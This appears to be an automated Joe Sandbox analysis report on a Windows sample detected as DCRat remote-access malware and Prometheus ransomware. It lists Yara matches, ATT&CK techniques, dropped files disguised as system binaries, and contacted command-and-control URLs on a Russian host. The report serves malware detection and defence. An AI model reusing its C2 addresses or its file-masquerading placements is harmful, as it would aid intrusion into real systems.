Source: Yara match	File source: 00000019.00000002.2159383737.0000000003231000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2187202631.0000000002FCD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.2180403115.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2172899315.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2155021661.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2159383737.000000000326D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2177147830.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2186040475.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.2179948488.0000000002781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2187202631.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2119361653.0000000002571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2256735845.0000000002E31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2074993070.0000000002A21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.2185482678.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2086148884.0000000012A2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 4KjLUaW30K.exe PID: 4564, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: audiodg.exe PID: 1488, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: audiodg.exe PID: 6768, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dllhost.exe PID: 7216, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dllhost.exe PID: 7264, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mnUYCZffXdEgQlZPiczLektp.exe PID: 7304, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mnUYCZffXdEgQlZPiczLektp.exe PID: 7316, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mnUYCZffXdEgQlZPiczLektp.exe PID: 7388, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ShellExperienceHost.exe PID: 7484, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ShellExperienceHost.exe PID: 7560, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: System.exe PID: 7616, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: System.exe PID: 7640, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mnUYCZffXdEgQlZPiczLektp.exe PID: 8092, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: System.exe PID: 8152, type: MEMORYSTR

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 0000001E.00000002.2180403115.0000000002BAB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2187145311.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2074993070.0000000002E38000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.2234188359.00000000024C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2187145311.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2159383737.0000000003231000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2187202631.0000000002FCD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.2180403115.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2172899315.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2155021661.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2159383737.000000000326D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2177147830.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2186040475.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.2179948488.0000000002781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2187202631.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2119361653.0000000002571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2256735845.0000000002E31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2074993070.0000000002A21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.2185482678.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2086148884.0000000012A2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 4KjLUaW30K.exe PID: 4564, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: audiodg.exe PID: 1488, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: audiodg.exe PID: 6768, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dllhost.exe PID: 7216, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dllhost.exe PID: 7264, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mnUYCZffXdEgQlZPiczLektp.exe PID: 7304, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mnUYCZffXdEgQlZPiczLektp.exe PID: 7316, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mnUYCZffXdEgQlZPiczLektp.exe PID: 7388, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ShellExperienceHost.exe PID: 7484, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ShellExperienceHost.exe PID: 7560, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: System.exe PID: 7616, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: System.exe PID: 7640, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mnUYCZffXdEgQlZPiczLektp.exe PID: 8092, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: System.exe PID: 8152, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	11 Scripting	Valid Accounts	241 Windows Management Instrumentation	1 Scheduled Task/Job	11 Process Injection	2 Masquerading	OS Credential Dumping	241 Security Software Discovery	Remote Services	11 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	11 Scripting	1 Scheduled Task/Job	11 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	21 Registry Run Keys / Startup Folder	21 Registry Run Keys / Startup Folder	151 Virtualization/Sandbox Evasion	Security Account Manager	151 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 DLL Side-Loading	1 DLL Side-Loading	11 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	1 Bypass User Account Control	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Obfuscated Files or Information	Cached Domain Credentials	34 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	22 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Bypass User Account Control	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
4KjLUaW30K.exe	83%	ReversingLabs	ByteCode-MSIL.Ransomware.Prometheus
4KjLUaW30K.exe	68%	Virustotal		Browse
4KjLUaW30K.exe	100%	Avira	HEUR/AGEN.1323984
4KjLUaW30K.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Program Files (x86)\Windows Defender\dllhost.exe	100%	Avira	HEUR/AGEN.1323984
C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\mnUYCZffXdEgQlZPiczLektp.exe	100%	Avira	HEUR/AGEN.1323984
C:\Users\user\AppData\Local\Temp\28bf72c6-5a6e-449b-a0d6-76cd4ab5c11d.vbs	100%	Avira	VBS/Starter.VPVT
C:\Users\user\AppData\Local\Temp\70189604-2a9a-4ba1-809b-491977885217.vbs	100%	Avira	VBS/Runner.VPXJ
C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	100%	Avira	HEUR/AGEN.1323984
C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\mnUYCZffXdEgQlZPiczLektp.exe	100%	Avira	HEUR/AGEN.1323984
C:\Users\Public\Downloads\ShellExperienceHost.exe	100%	Avira	HEUR/AGEN.1323984
C:\Recovery\System.exe	100%	Avira	HEUR/AGEN.1323984
C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\mnUYCZffXdEgQlZPiczLektp.exe	100%	Avira	HEUR/AGEN.1323984
C:\Users\user\AppData\Local\Temp\ae22e728c3f23233571eb704564b4445f7960812.exe	100%	Avira	HEUR/AGEN.1323984
C:\Program Files (x86)\Windows Defender\dllhost.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\mnUYCZffXdEgQlZPiczLektp.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\mnUYCZffXdEgQlZPiczLektp.exe	100%	Joe Sandbox ML
C:\Users\Public\Downloads\ShellExperienceHost.exe	100%	Joe Sandbox ML
C:\Recovery\System.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\mnUYCZffXdEgQlZPiczLektp.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\ae22e728c3f23233571eb704564b4445f7960812.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\mnUYCZffXdEgQlZPiczLektp.exe	83%	ReversingLabs	ByteCode-MSIL.Ransomware.Prometheus
C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	83%	ReversingLabs	ByteCode-MSIL.Ransomware.Prometheus
C:\Program Files (x86)\Windows Defender\dllhost.exe	83%	ReversingLabs	ByteCode-MSIL.Ransomware.Prometheus
C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	83%	ReversingLabs	ByteCode-MSIL.Ransomware.Prometheus
C:\Recovery\System.exe	83%	ReversingLabs	ByteCode-MSIL.Ransomware.Prometheus
C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	83%	ReversingLabs	ByteCode-MSIL.Ransomware.Prometheus
C:\Users\Public\Downloads\ShellExperienceHost.exe	83%	ReversingLabs	ByteCode-MSIL.Ransomware.Prometheus
C:\Users\user\AppData\Local\Temp\ae22e728c3f23233571eb704564b4445f7960812.exe	83%	ReversingLabs	ByteCode-MSIL.Ransomware.Prometheus

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
a1043195.xsph.ru	11%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://a1043195.xsph.ru/e561840a.php?cl=MU3vrX2xf8nUihMHACnKj36jO&RpUrFFQZYG69rKpAFv3A0wkZY8y=NTXUg0GMdy3iEJI&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&cl=MU3vrX2xf8nUihMHACnKj36jO&RpUrFFQZYG69rKpAFv3A0wkZY8y=NTXUg0GMdy3iEJI	100%	Avira URL Cloud	malware
http://a1043195.xsph.ru/e561840a.php?5KSwfM1XMNin8a1tisW=mdlGy9qsXR&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&5KSwfM1XMNin8a1tisW=mdlGy9qsXR	100%	Avira URL Cloud	malware
http://a1043195.xsph.ru/e561840a.php?xVG80hM=hn2&8PfMQbdasrWBeFMD7qf8K3A4XF9O9rr=CHDgx4&gqVdG=FeuUIF0I3yEOlyKbPbB9N8XBqQCi8Sy&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&xVG80hM=hn2&8PfMQbdasrWBeFMD7qf8K3A4XF9O9rr=CHDgx4&gqVdG=FeuUIF0I3yEOlyKbPbB9N8XBqQCi8Sy	100%	Avira URL Cloud	malware
http://a1043195.xsph.ru/e561840a.php?6AlqDLuQGYbBId=gCYL9zkUdBuC08JQaV7uaRdflujR&PwmCbXGZ2=jWpIoTJ3R	100%	Avira URL Cloud	malware
http://a1043195.xsph.ru/e561840a.php?OA4wYep3at3BJWRE=LjRHrGY1NakWTvTw0sePnjeqs&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&OA4wYep3at3BJWRE=LjRHrGY1NakWTvTw0sePnjeqs	100%	Avira URL Cloud	malware
http://a1043195.xsph.ru/e561840a.php?6AlqDLuQGYbBId=gCYL9zkUdBuC08JQaV7uaRdflujR&PwmCbXGZ2=jWpIoTJ3R6IApKsc&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&6AlqDLuQGYbBId=gCYL9zkUdBuC08JQaV7uaRdflujR&PwmCbXGZ2=jWpIoTJ3R6IApKsc	100%	Avira URL Cloud	malware
http://a1043195.xsph.ru/e561840a.php?TuL2hSCP9SfVYBiGie5CRyTCq=bSB9NQ&hPoKZhDXzG8XL4Xlk2=O6efaILX0uNAFOw1v45I61pbrV&fQEqbHZBmDuOCOKMmmG2I=Dlqot1XRCxEepH&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&TuL2hSCP9SfVYBiGie5CRyTCq=bSB9NQ&hPoKZhDXzG8XL4Xlk2=O6efaILX0uNAFOw1v45I61pbrV&fQEqbHZBmDuOCOKMmmG2I=Dlqot1XRCxEepH	100%	Avira URL Cloud	malware
http://a1043195.xsph.ru/e561840a.php?pjrl5w7K39YkW8ohPsI7w0KcXus=bWRfDt01CulxteygFk08RJEfi7EyY&NLECtgr2h=IxeeHUNRCoWx3tnSRw7F&BcxgatrvRyMCOzeojXNtw=u2aRUYaP45b7HUr7rlgfuzJvp&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&pjrl5w7K39YkW8ohPsI7w0KcXus=bWRfDt01CulxteygFk08RJEfi7EyY&NLECtgr2h=IxeeHUNRCoWx3tnSRw7F&BcxgatrvRyMCOzeojXNtw=u2aRUYaP45b7HUr7rlgfuzJvp	100%	Avira URL Cloud	malware
http://a1043195.xsph.ru/	100%	Avira URL Cloud	malware
http://a1043195.xsph.ru	100%	Avira URL Cloud	malware
http://a1043195.xsph.ru/e561840a.php?I2G4s=IMSEV2S071HqCvJ1J7jvi0Ev&glD0UhPCN5IkMoV0wZ=KC1L8RsJV7M&IhhyROAmT1=y0AR6SN4wavlfoaFjmY4F&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&I2G4s=IMSEV2S071HqCvJ1J7jvi0Ev&glD0UhPCN5IkMoV0wZ=KC1L8RsJV7M&IhhyROAmT1=y0AR6SN4wavlfoaFjmY4F	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
a1043195.xsph.ru	141.8.192.93	true	true	11%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://a1043195.xsph.ru/e561840a.php?cl=MU3vrX2xf8nUihMHACnKj36jO&RpUrFFQZYG69rKpAFv3A0wkZY8y=NTXUg0GMdy3iEJI&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&cl=MU3vrX2xf8nUihMHACnKj36jO&RpUrFFQZYG69rKpAFv3A0wkZY8y=NTXUg0GMdy3iEJI	true	Avira URL Cloud: malware	unknown
http://a1043195.xsph.ru/e561840a.php?5KSwfM1XMNin8a1tisW=mdlGy9qsXR&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&5KSwfM1XMNin8a1tisW=mdlGy9qsXR	true	Avira URL Cloud: malware	unknown
http://a1043195.xsph.ru/e561840a.php?OA4wYep3at3BJWRE=LjRHrGY1NakWTvTw0sePnjeqs&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&OA4wYep3at3BJWRE=LjRHrGY1NakWTvTw0sePnjeqs	true	Avira URL Cloud: malware	unknown
http://a1043195.xsph.ru/e561840a.php?xVG80hM=hn2&8PfMQbdasrWBeFMD7qf8K3A4XF9O9rr=CHDgx4&gqVdG=FeuUIF0I3yEOlyKbPbB9N8XBqQCi8Sy&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&xVG80hM=hn2&8PfMQbdasrWBeFMD7qf8K3A4XF9O9rr=CHDgx4&gqVdG=FeuUIF0I3yEOlyKbPbB9N8XBqQCi8Sy	true	Avira URL Cloud: malware	unknown
http://a1043195.xsph.ru/e561840a.php?6AlqDLuQGYbBId=gCYL9zkUdBuC08JQaV7uaRdflujR&PwmCbXGZ2=jWpIoTJ3R6IApKsc&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&6AlqDLuQGYbBId=gCYL9zkUdBuC08JQaV7uaRdflujR&PwmCbXGZ2=jWpIoTJ3R6IApKsc	true	Avira URL Cloud: malware	unknown
http://a1043195.xsph.ru/e561840a.php?TuL2hSCP9SfVYBiGie5CRyTCq=bSB9NQ&hPoKZhDXzG8XL4Xlk2=O6efaILX0uNAFOw1v45I61pbrV&fQEqbHZBmDuOCOKMmmG2I=Dlqot1XRCxEepH&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&TuL2hSCP9SfVYBiGie5CRyTCq=bSB9NQ&hPoKZhDXzG8XL4Xlk2=O6efaILX0uNAFOw1v45I61pbrV&fQEqbHZBmDuOCOKMmmG2I=Dlqot1XRCxEepH	true	Avira URL Cloud: malware	unknown
http://a1043195.xsph.ru/e561840a.php?pjrl5w7K39YkW8ohPsI7w0KcXus=bWRfDt01CulxteygFk08RJEfi7EyY&NLECtgr2h=IxeeHUNRCoWx3tnSRw7F&BcxgatrvRyMCOzeojXNtw=u2aRUYaP45b7HUr7rlgfuzJvp&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&pjrl5w7K39YkW8ohPsI7w0KcXus=bWRfDt01CulxteygFk08RJEfi7EyY&NLECtgr2h=IxeeHUNRCoWx3tnSRw7F&BcxgatrvRyMCOzeojXNtw=u2aRUYaP45b7HUr7rlgfuzJvp	true	Avira URL Cloud: malware	unknown
http://a1043195.xsph.ru/e561840a.php?I2G4s=IMSEV2S071HqCvJ1J7jvi0Ev&glD0UhPCN5IkMoV0wZ=KC1L8RsJV7M&IhhyROAmT1=y0AR6SN4wavlfoaFjmY4F&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&I2G4s=IMSEV2S071HqCvJ1J7jvi0Ev&glD0UhPCN5IkMoV0wZ=KC1L8RsJV7M&IhhyROAmT1=y0AR6SN4wavlfoaFjmY4F	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://cp.sprinthost.ru	mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2119361653.00000000027C8000.00000004.00000800.00020000.00000000.sdmp, mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2119361653.00000000027F0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://a1043195.xsph.ru/e561840a.php?6AlqDLuQGYbBId=gCYL9zkUdBuC08JQaV7uaRdflujR&PwmCbXGZ2=jWpIoTJ3R	mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2119361653.00000000027F0000.00000004.00000800.00020000.00000000.sdmp, mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2119361653.000000000278F000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://index.from.sh/pages/game.html	mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2119361653.00000000027C8000.00000004.00000800.00020000.00000000.sdmp, mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2119361653.00000000027F0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cp.sprinthost.ru/auth/login	mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2119361653.00000000027C8000.00000004.00000800.00020000.00000000.sdmp, mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2119361653.00000000027F0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	4KjLUaW30K.exe, 00000000.00000002.2074993070.0000000002E38000.00000004.00000800.00020000.00000000.sdmp, mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2119361653.000000000278F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://a1043195.xsph.ru/	mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2119361653.0000000002771000.00000004.00000800.00020000.00000000.sdmp, mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2119361653.000000000278F000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://go.mic	mnUYCZffXdEgQlZPiczLektp.exe, 0000001D.00000002.2168378706.0000000000968000.00000004.00000020.00020000.00000000.sdmp	false		high
http://a1043195.xsph.ru	mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2119361653.00000000027F0000.00000004.00000800.00020000.00000000.sdmp, mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2119361653.00000000027BF000.00000004.00000800.00020000.00000000.sdmp, mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2119361653.00000000027B4000.00000004.00000800.00020000.00000000.sdmp, mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2119361653.000000000278F000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
141.8.192.93	a1043195.xsph.ru	Russian Federation		35278	SPRINTHOSTRU	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1561676
Start date and time:	2024-11-24 04:01:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 37s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	4KjLUaW30K.exe renamed because original name is a hash value
Original Sample Name:	181d043c0617914801548f09d5b776d4.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@33/31@1/1
EGA Information:	Failed
HCA Information:	Successful, ratio: 51% Number of executed functions: 556 Number of non-executed functions: 20
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 4.245.163.56, 2.16.149.141, 2.16.149.153, 40.69.42.241, 20.12.23.50
Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, download.windowsupdate.com.edgesuite.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
Execution Graph export aborted for target 4KjLUaW30K.exe, PID 4564 because it is empty
Execution Graph export aborted for target ShellExperienceHost.exe, PID 7484 because it is empty
Execution Graph export aborted for target ShellExperienceHost.exe, PID 7560 because it is empty
Execution Graph export aborted for target System.exe, PID 7616 because it is empty
Execution Graph export aborted for target System.exe, PID 7640 because it is empty
Execution Graph export aborted for target System.exe, PID 8152 because it is empty
Execution Graph export aborted for target audiodg.exe, PID 1488 because it is empty
Execution Graph export aborted for target audiodg.exe, PID 6768 because it is empty
Execution Graph export aborted for target dllhost.exe, PID 7216 because it is empty
